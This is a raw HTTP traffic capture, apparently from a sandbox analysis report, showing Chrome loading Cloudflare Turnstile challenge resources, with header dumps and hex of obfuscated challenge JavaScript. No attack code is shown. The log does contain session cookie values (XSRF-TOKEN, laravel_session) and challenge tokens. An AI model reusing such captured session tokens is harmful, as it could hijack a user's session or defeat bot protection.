                                                                                                                                                                                                                                                Cookie: XSRF-TOKEN=eyJpdiI6IkdkRDR6TmdqSjdvU1Aweml3MHIyUVE9PSIsInZhbHVlIjoiazh6MWQvSWo4OUtjN2IyZ1h0VlN2TnMxS1VLTkt6WDVLQmhaWjJ5N0NJdzRncHFPc0R2VHJwc2FoUVNsblVVVURsSm4rR3YwdkJaS3Q2MCtxVHdHaTA4T2l3K1FyMTJvdHZWYUpTVXZ1WmUybXZvU2ZPNlpMM284TUxQUWxacjciLCJtYWMiOiIzNmVlZjllNDM3OGY5OGZjZDYwMDE0NThiMWFjMWI5Mzg0ODQzMGJmOWJlMzY0NjI3YWExNzI4MWVhOWU4ZmE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlUvQi8zVk5CTXdQeUR3aFRGNjAyN2c9PSIsInZhbHVlIjoiaHZRZ3NzeDByQTJpWGUvYW9tNC9GVDZGci9hNGtWZ1hhSE1id3VxQ3RiL2JaL0plVURHWVBscTR4MThXQW5aNGxQTFBYYWVvb1NoQmhPTnV6Qk1GNmlzTHJXZytkcEg1eSt4NnN0Uk1yVUZ1a1YycnNwZ3R1Y3E1TlQwUkVyM1oiLCJtYWMiOiI2YTZmN2QwYjkzNjhjZjYxM2ZlZTFhNzYyNmM3YjllZmJkZWM2NmI3NzEzMjRmNGI3NjhiMzRlMzMwY2IyYmVhIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                2024-12-20 15:46:08 UTC1059INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kllo37THIMGIsEktpkFIODih6hoCQ%2BdE%2BD8mDLXcWZdqQnNvqMX3zHKDtnNmN2REPiY%2FNb7fy0luMhC7nDKEeOy4mdSqQXvAtrA4qt1hRU5OaHvhi9Nznasxy1arDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1169&min_rtt=1125&rtt_var=352&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2234&delivery_rate=2507042&cwnd=251&unsent_bytes=0&cid=a4112fac9ed84067&ts=435&x=0"
                                                                                                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c3716fc24249-EWR
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=605&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1899&delivery_rate=1811414&cwnd=230&unsent_bytes=0&cid=5e5264ded2086e82&ts=10282&x=0"
                                                                                                                                                                                                                                                2024-12-20 15:46:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                61192.168.2.1149897104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:08 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:09 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c376bef10f53-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                62192.168.2.1149898104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f50c3606cea43b9&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:09 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 120492
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c37a1dd04322-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54
                                                                                                                                                                                                                                                Data Ascii: 0your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_footer_privacy":"Privacy","not_embedded":"T
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 2c 66 58 2c 66 59 2c 67 32 2c 67 33 2c 67 36 2c 67 37 2c 67 78 2c 67 45 2c 67 34 2c 67 35 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 33 31 36 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 39 37 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 34 39 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 34 35 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 32 34 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 36 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 30 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49
                                                                                                                                                                                                                                                Data Ascii: ,fX,fY,g2,g3,g6,g7,gx,gE,g4,g5){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(316))/1*(-parseInt(gI(1597))/2)+parseInt(gI(1549))/3+-parseInt(gI(945))/4*(-parseInt(gI(324))/5)+parseInt(gI(1106))/6+parseInt(gI(1160))/7*(parseInt(gI
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 74 75 72 6e 20 69 28 6a 29 7d 7d 2c 67 4e 28 35 36 33 29 21 3d 3d 65 5b 67 4e 28 31 33 39 39 29 5d 29 68 5b 67 4e 28 31 34 38 34 29 5d 28 65 2c 67 4e 28 31 31 30 32 29 29 2c 68 5b 67 4e 28 31 34 38 34 29 5d 28 66 2c 67 4e 28 31 35 37 36 29 29 3b 65 6c 73 65 20 69 66 28 65 4d 5b 65 5b 67 4e 28 33 36 32 29 5d 5d 29 7b 69 66 28 65 5b 67 4e 28 31 34 34 30 29 5d 3d 3d 3d 65 5b 67 4e 28 31 33 33 37 29 5d 29 72 65 74 75 72 6e 27 27 3b 65 6c 73 65 20 65 4d 5b 67 4e 28 31 30 31 37 29 5d 5b 67 4e 28 31 35 36 37 29 5d 28 29 2c 65 4d 5b 67 4e 28 31 30 31 37 29 5d 5b 67 4e 28 34 31 39 29 5d 28 29 2c 65 4d 5b 67 4e 28 38 32 38 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 67 4e 28 33 38 30 29 5d 5b 67 4e 28 31 34 37 37 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 67 4e 28 39 34 38 29 2c
                                                                                                                                                                                                                                                Data Ascii: turn i(j)}},gN(563)!==e[gN(1399)])h[gN(1484)](e,gN(1102)),h[gN(1484)](f,gN(1576));else if(eM[e[gN(362)]]){if(e[gN(1440)]===e[gN(1337)])return'';else eM[gN(1017)][gN(1567)](),eM[gN(1017)][gN(419)](),eM[gN(828)]=!![],eM[gN(380)][gN(1477)]({'source':gN(948),
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 2b 65 4d 5b 67 4f 28 35 31 37 29 5d 5b 67 4f 28 35 37 34 29 5d 2c 27 2f 27 29 2b 65 4d 5b 67 4f 28 35 31 37 29 5d 2e 63 48 2c 27 2f 27 29 2c 65 4d 5b 67 4f 28 35 31 37 29 5d 5b 67 4f 28 31 33 35 30 29 5d 29 2c 73 3d 7b 7d 2c 73 5b 67 4f 28 37 32 34 29 5d 3d 65 4d 5b 67 4f 28 35 31 37 29 5d 5b 67 4f 28 37 32 34 29 5d 2c 73 5b 67 4f 28 38 30 30 29 5d 3d 65 4d 5b 67 4f 28 35 31 37 29 5d 5b 67 4f 28 38 30 30 29 5d 2c 73 5b 67 4f 28 37 34 39 29 5d 3d 65 4d 5b 67 4f 28 35 31 37 29 5d 5b 67 4f 28 37 34 39 29 5d 2c 73 5b 67 4f 28 31 30 32 36 29 5d 3d 65 4d 5b 67 4f 28 35 31 37 29 5d 5b 67 4f 28 31 36 33 35 29 5d 2c 78 3d 73 2c 42 3d 6e 65 77 20 65 4d 5b 28 67 4f 28 35 38 32 29 29 5d 28 29 2c 21 42 29 72 65 74 75 72 6e 3b 43 3d 6b 5b 67 4f 28 31 31 34 34 29 5d 2c
                                                                                                                                                                                                                                                Data Ascii: +eM[gO(517)][gO(574)],'/')+eM[gO(517)].cH,'/'),eM[gO(517)][gO(1350)]),s={},s[gO(724)]=eM[gO(517)][gO(724)],s[gO(800)]=eM[gO(517)][gO(800)],s[gO(749)]=eM[gO(517)][gO(749)],s[gO(1026)]=eM[gO(517)][gO(1635)],x=s,B=new eM[(gO(582))](),!B)return;C=k[gO(1144)],
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 35 35 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 56 29 7b 69 66 28 67 56 3d 67 53 2c 67 56 28 31 34 37 35 29 3d 3d 3d 6b 5b 67 56 28 31 35 31 33 29 5d 29 65 4d 5b 67 56 28 31 32 39 30 29 5d 28 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 27 6f 2e 27 2b 6e 7d 2c 31 65 33 29 2c 65 4d 5b 67 53 28 31 31 38 35 29 5d 5b 67 53 28 31 30 36 38 29 5d 28 6b 5b 67 53 28 35 39 37 29 5d 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 52 3d 30 2c 65 55 3d 7b 7d 2c 65 55 5b 67 4a 28 38 36 35 29 5d 3d 65 54 2c 65 4d 5b 67 4a 28 34 35 33 29 5d 3d 65 55 2c 65 57 3d 65 4d 5b 67 4a 28 35 31 37 29 5d 5b 67 4a 28 38 35 32 29 5d 5b 67 4a 28 31 32 33 30 29 5d 2c 65 58 3d 65 4d 5b 67 4a 28 35 31 37 29 5d 5b 67 4a 28 38 35 32 29 5d 5b 67 4a 28 35 33 37 29 5d 2c 65 59 3d 65 4d 5b 67 4a
                                                                                                                                                                                                                                                Data Ascii: 559)](function(gV){if(gV=gS,gV(1475)===k[gV(1513)])eM[gV(1290)]();else return'o.'+n},1e3),eM[gS(1185)][gS(1068)](k[gS(597)],e));return![]},eR=0,eU={},eU[gJ(865)]=eT,eM[gJ(453)]=eU,eW=eM[gJ(517)][gJ(852)][gJ(1230)],eX=eM[gJ(517)][gJ(852)][gJ(537)],eY=eM[gJ
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 32 30 29 5d 3d 27 6f 27 2c 66 58 5b 67 4a 28 37 34 32 29 5d 3d 27 73 27 2c 66 58 5b 67 4a 28 37 37 30 29 5d 3d 27 75 27 2c 66 58 5b 67 4a 28 31 32 31 32 29 5d 3d 27 7a 27 2c 66 58 5b 67 4a 28 38 33 31 29 5d 3d 27 6e 27 2c 66 58 5b 67 4a 28 31 34 36 30 29 5d 3d 27 49 27 2c 66 58 5b 67 4a 28 39 34 37 29 5d 3d 27 62 27 2c 66 59 3d 66 58 2c 65 4d 5b 67 4a 28 34 35 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 69 49 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 69 49 3d 67 4a 2c 6f 3d 7b 27 4d 57 65 49 53 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 41 73 56 75 51 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 44 4f 56 5a 74
                                                                                                                                                                                                                                                Data Ascii: 20)]='o',fX[gJ(742)]='s',fX[gJ(770)]='u',fX[gJ(1212)]='z',fX[gJ(831)]='n',fX[gJ(1460)]='I',fX[gJ(947)]='b',fY=fX,eM[gJ(457)]=function(g,h,i,j,iI,o,x,B,C,D,E,F){if(iI=gJ,o={'MWeIS':function(G,H){return G<H},'AsVuQ':function(G,H,I,J){return G(H,I,J)},'DOVZt
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c 76 7d 2c 6a 5b 69 4b 28 37 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 76 7d 2c 6b 3d 6a 2c 6c 3d 4f 62 6a 65 63 74 5b 69 4b 28 31 34 32 33 29 5d 28 69 29 2c 6d 3d 30 3b 6d 3c 6c 5b 69 4b 28 35 32 38 29 5d 3b 6d 2b 2b 29 69 66 28 6e 3d 6c 5b 6d 5d 2c 6b 5b 69 4b 28 38 30 32 29 5d 28 27 66 27 2c 6e 29 26 26 28 6e 3d 27 4e 27 29 2c 68 5b 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6b 5b 69 4b 28 35 36 36 29 5d 28 6f 2c 69 5b 6c 5b 6d 5d 5d 5b 69 4b 28 35 32 38 29 5d 29 3b 6b 5b 69 4b 28 37 34 35 29 5d 28 2d 31 2c 68 5b 6e 5d 5b 69 4b 28 39 31 38 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 26 26 28 67 33 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e
                                                                                                                                                                                                                                                Data Ascii: unction(s,v){return s<v},j[iK(745)]=function(s,v){return s===v},k=j,l=Object[iK(1423)](i),m=0;m<l[iK(528)];m++)if(n=l[m],k[iK(802)]('f',n)&&(n='N'),h[n]){for(o=0;k[iK(566)](o,i[l[m]][iK(528)]);k[iK(745)](-1,h[n][iK(918)](i[l[m]][o]))&&(g3(i[l[m]][o])||h[n
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 6a 53 52 4a 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 58 76 70 49 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 50 6c 49 50 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 7a 67 6f 53 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4c 71 6c 52 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 42 67 62 69 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6c 46 77 6b 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d
                                                                                                                                                                                                                                                Data Ascii: ){return i|h},'jSRJh':function(h,i){return h<<i},'XvpIu':function(h,i){return h<<i},'PlIPU':function(h,i){return h&i},'zgoSd':function(h,i){return h==i},'LqlRT':function(h,i){return h<<i},'Bgbid':function(h,i){return h==i},'lFwkt':function(h,i){return h==
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1369INData Raw: 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 6a 73 28 35 32 38 29 5d 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 6a 73 28 31 36 37 31 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 6a 73 28 39 39 38 29 5d 5b 6a 73 28 39 34 34 29 5d 5b 6a 73 28 37 31 34 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 64 5b 6a 73 28 31 33 31 31 29 5d 28 43 2c 4b 29 2c 4f 62 6a 65 63 74 5b 6a 73 28 39 39 38 29 5d 5b 6a 73 28 39 34 34 29 5d 5b 6a 73 28 37 31 34 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 73 28 39 39 38 29 5d 5b 6a 73 28 39 34 34 29 5d 5b 6a 73 28 37 31 34 29
                                                                                                                                                                                                                                                Data Ascii: eturn'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[js(528)];J+=1)if(K=i[js(1671)](J),Object[js(998)][js(944)][js(714)](x,K)||(x[K]=E++,B[K]=!0),L=d[js(1311)](C,K),Object[js(998)][js(944)][js(714)](x,L))C=L;else{if(Object[js(998)][js(944)][js(714)


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                63192.168.2.1149899104.18.94.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 3241
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                CF-Challenge: 2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC3241OUTData Raw: 76 5f 38 66 35 30 63 33 36 30 36 63 65 61 34 33 62 39 3d 6c 6b 79 49 78 49 53 49 33 49 48 49 75 49 50 39 65 37 39 65 58 2d 42 58 42 47 46 59 42 46 65 42 2d 35 47 77 42 33 35 65 6a 39 65 35 77 69 65 64 4d 49 77 56 6f 58 4d 56 78 62 6b 42 61 65 30 2d 53 77 65 43 53 49 65 36 76 65 46 52 24 65 59 55 2d 65 47 79 62 49 6a 4d 65 24 49 53 78 55 65 75 39 56 53 65 33 65 46 67 34 2d 2d 51 74 36 53 75 36 62 49 4f 77 55 35 6e 6c 76 33 79 65 4f 37 66 51 42 32 6c 4b 54 77 32 65 64 36 2d 56 32 62 65 6a 79 65 4e 49 65 48 42 6c 67 74 76 30 56 62 65 6a 58 7a 46 73 2d 53 59 49 49 38 42 24 61 36 68 62 7a 4d 4d 6c 56 65 63 49 48 74 62 65 42 70 65 6c 58 7a 65 79 37 62 71 49 53 38 66 56 35 65 2d 69 7a 6b 53 4f 7a 57 71 49 53 62 71 6f 2d 65 51 49 65 62 30 49 42 38 65 35 79 65 41
                                                                                                                                                                                                                                                Data Ascii: v_8f50c3606cea43b9=lkyIxISI3IHIuIP9e79eX-BXBGFYBFeB-5GwB35ej9e5wiedMIwVoXMVxbkBae0-SweCSIe6veFR$eYU-eGybIjMe$ISxUeu9VSe3eFg4--Qt6Su6bIOwU5nlv3yeO7fQB2lKTw2ed6-V2bejyeNIeHBlgtv0VbejXzFs-SYII8B$a6hbzMMlVecIHtbeBpelXzey7bqIS8fV5e-izkSOzWqISbqo-eQIeb0IB8e5yeA
                                                                                                                                                                                                                                                2024-12-20 15:46:09 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:09 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 149536
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-gen: 3eSl32WZfZtSh+qXdZWeOOlMzO3q4dYNYM12Qi2UYBtWmLvbqjZPN5YOP4pt3mqBiOXE4sCVG/JxTT+a6yrOj96t/JEFRjuUQM+xoH2/tHbeSbyQoDnPGkKgjydXvm939NqIuFkrWZNXTjycKsgVND81eVwFGN4giPgxNxBcO2lA7W09sqPZzs9rwE+A1Ve2jxP4wgT39IetxtnhE9izyQv/0rus/xZgMAl1W2NRn+rZW3aFuX8AvFh8KjJ1x/hVBf9MJANRYPIffQ04fYKSR9bJi1u8bN4lntOhKbwASs5PbYGYJN3WTvZbEF0xMUOdBvOC4pJ2nfXnU7MgtS5XfAEFqMX9TjDNkkz9L7yh+9TRquWqKX9L3XdcTrepBfqOqeuPzkFiPtVFgAViOCfwNnoDzwCMwAy1dy8PakHAH3SP2kGrpm/qd1oTcDwhlncX/+4oP8YVxZsApZJtHImAB/yTfQE59adlwN2gTf2y0DCcdG8=$mkkuho7CSJNTo7DQ
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c379dd0c2361-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
